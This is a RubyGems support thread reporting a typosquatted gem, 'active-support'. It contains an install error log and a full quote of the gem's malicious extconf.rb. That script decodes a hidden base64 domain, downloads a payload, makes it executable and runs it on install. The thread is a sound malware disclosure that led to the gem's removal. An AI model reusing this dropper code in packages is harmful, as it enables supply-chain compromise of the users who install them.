Reporting Abuse on active-support

Guilherme Ramos's Avatar

Guilherme Ramos

09 Aug, 2018 02:10 AM

This seems like a bogus gem.
Use a very similar name as a very popular gem.
Description seems off

Installation gives

This seems like a bogus gem.
Use a very similar name as a very popular gem.
Description seems off

Installation gives

Fetching gem metadata from https://rubygems.org/.....
Resolving dependencies...
Fetching active-support 5.2.0
Installing active-support 5.2.0 with native extensions
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.

current directory:
/redacted/.rvm/gems/ruby-2.4.4/gems/active-support-5.2.0/ext/trellislike/unflaming/waffling
/redacted/.rvm/rubies/ruby-2.4.4/bin/ruby -r ./siteconf20180809-44989-1mvw31o.rb extconf.rb
extconf.rb:27:in `run': undefined method `install_exploit' for Smectis:Class (NoMethodError)
Did you mean? install_explot
from extconf.rb:31:in `<main>'

extconf failed, exit code 1

Gem files will remain installed in /redacted/.rvm/gems/ruby-2.4.4/gems/active-support-5.2.0 for
inspection.
Results logged to
/redacted/.rvm/gems/ruby-2.4.4/extensions/x86_64-darwin-17/2.4.0/active-support-5.2.0/gem_make.out

An error occurred while installing active-support (5.2.0), and Bundler cannot continue.
Make sure that `gem install active-support -v '5.2.0' --source 'https://rubygems.org/'` succeeds
before bundling.

In Gemfile:
  active-support

  1. 1 Posted by Sam Giffney on 09 Aug, 2018 02:15 AM

    Sam Giffney's Avatar

    Further investigation shows definite malware behaviour.

    The gem duplicate official activesupport (no hyphen) code but adds a compiled extension.

    active-support-5.2.0.gem/data/ext/trellislike/unflaming/waffling/extconf.rb
    attempts to resolve a base64 encoded domain, download a payload and execute.

    require 'net/http'
    require 'uri'
    require 'base64'
    require 'resolv'

    class Smectis
      def self.install_explot(weighership)
        if !weighership.nil? and weighership != '0.0.0.0'
          educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming'))
          File.open('/tmp/autosymbiontic', 'wb+') do |uterometer|
            uterometer.binmode
            uterometer.write(educable.body)
            uterometer.chmod(0777)
            uterometer.close
          end
          system('/tmp/autosymbiontic')
        end
      end

      def self.run()
        milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU='
        jaunting = nil
        begin
          jaunting = Resolv.getaddress(Base64.decode64(milligram))
        rescue
        end
        self.install_exploit(jaunting)
      end
    end

    Smectis.run()

  2. 2 Posted by Patrick Figel on 09 Aug, 2018 12:15 PM

    Patrick Figel's Avatar

    Probably the same thing with this gem from the same user: https://rubygems.org/gems/deamons

  3. Support Staff 3 Posted by David Radcliffe on 09 Aug, 2018 01:10 PM

    David Radcliffe's Avatar

    Thanks for the report. We have removed the gem.

  4. David Radcliffe closed this discussion on 09 Aug, 2018 01:10 PM.

Comments are currently closed for this discussion. You can start a new one.

Keyboard shortcuts

Generic

? Show this help
ESC Blurs the current field

Comment Form

r Focus the comment reply box
^ + ↩ Submit the comment

You can use Command ⌘ instead of Control ^ on Mac